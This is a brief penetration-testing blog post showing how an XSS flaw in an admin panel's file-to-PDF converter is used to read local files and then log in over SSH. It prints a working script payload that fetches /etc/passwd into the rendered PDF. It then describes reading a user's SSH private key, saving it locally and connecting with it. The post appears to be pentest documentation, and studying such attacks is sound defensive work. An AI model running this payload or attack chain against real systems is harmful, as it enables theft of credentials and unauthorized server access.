hosting image

Pentest XSS Attack To SSH

Situation : 

  • Admin Panel infected with xss and uploading any file converted to pdf.

 

P0c from (https://www.noob.ninja/2017/11/local-file-read-via-xss-in-dynamically.html):

<script> 
x=new XMLHttpRequest; 
x.onload=function()
{ document.write(this.responseText) };
 x.open("GET","file:///etc/passwd"); x.send();
</script>

 

Explaining it in images:

 

Next Download the pdf :

Reading /etc/passwd success , next try to read /home/user/.ssh/rsa_id


and :

 

Making local id_rsa and chmod it 700.. then try to ssh !

 

Leave a Reply

Your email address will not be published.